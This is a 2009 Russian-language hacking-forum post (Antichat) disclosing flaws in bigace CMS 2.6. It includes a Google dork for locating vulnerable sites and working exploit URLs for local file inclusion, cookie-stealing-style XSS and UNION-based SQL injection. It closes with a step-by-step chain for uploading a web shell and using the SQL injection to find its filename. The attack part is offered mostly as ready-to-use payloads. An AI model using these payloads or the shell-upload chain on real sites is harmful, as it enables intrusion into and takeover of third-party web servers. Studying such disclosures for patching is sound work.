Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Уязвимости bigace CMS 2.6 (https://forum.antichat.xyz/showthread.php?t=150520)

Dimi4 23.10.2009 14:08
Уязвимости bigace CMS 2.6
 
Уязвимости bigace CMS 2.6

Product: bigace CMS
Version: 2.6
Dork: "Powered by BIGACE 2.6"
Site: www.bigace.de
Found by: Dimi4
Date: 23.10.09

Local File Inclusion
/public/index.php : 78 line

PHP код:
// PROCESSING COMMAND INTERPRETER
        $COMMAND_FILE _BIGACE_DIR_ROOT '/system/command/' $GLOBALS['_BIGACE']['PARSER']->getCommand() . '.cmd.php';
        if ( file_exists($COMMAND_FILE) )
        {
            include_once ($COMMAND_FILE); 
Need: magic_quotes_gpc = OFF


Код:
http://localhost/test/bigace_2.6/public/index.php?cmd=[evil_file].php%00&id=tpl-frameset_tADMIN_len

Cross Site Scripting

Код:
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=tpl-frameset_tADMIN_len%3Cscript%3Ealert(document.cookie)%3C/script%3E
При просмотре логов, сработает алерт (http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=[id])

SQL-injection
Вы скажите да нахера нам скуля, если в админке уже? Так вот, для того чтобы узнать имя нашего шелла.

system/admin/plugins/logging.php : 76 line

PHP код:
if(isset($_GET['view']))
{
    $values = array(
                    'ORDER_BY'          => '',
                    'LIMIT'             => '',
                    'WHERE_EXTENSION'   => " AND id='".$_GET['view']."'"
    );
    
    $sqlString $GLOBALS['_BIGACE']['SQL_HELPER']->loadStatement('logging_filter');
    $sqlString $GLOBALS['_BIGACE']['SQL_HELPER']->prepareStatement($sqlString$values);
    $entry $GLOBALS['_BIGACE']['SQL_HELPER']->execute($sqlString);
    $entry $entry->next(); 
Код:
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=-48'+union+select+text_1,2,3,4,5,6,7,8,9,10+from+cms_item_5+where+id=[id]--+
Пошаговая заливка шелла:

В админке:
1. Идем в заливку файлов. Грузим свой шелл. Проверки на расширение нет. В результате получаем ИД, запоминаем. (Например ИД=3)
2. С помощю скули получаем зашифрованое имя шелла:
Код:
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=-48'+union+select+text_1,2,3,4,5,6,7,8,9,10+from+cms_item_5+where+id=3--+
3. Получили допустим e449d2128602875bd6c84284a3458a42_1256285544.php

Идем в
http://localhost/test/bigace_2.6/consumer/cid1/items/file/[name]

Jokester 23.04.2010 15:48
слив РОА


Время: 12:34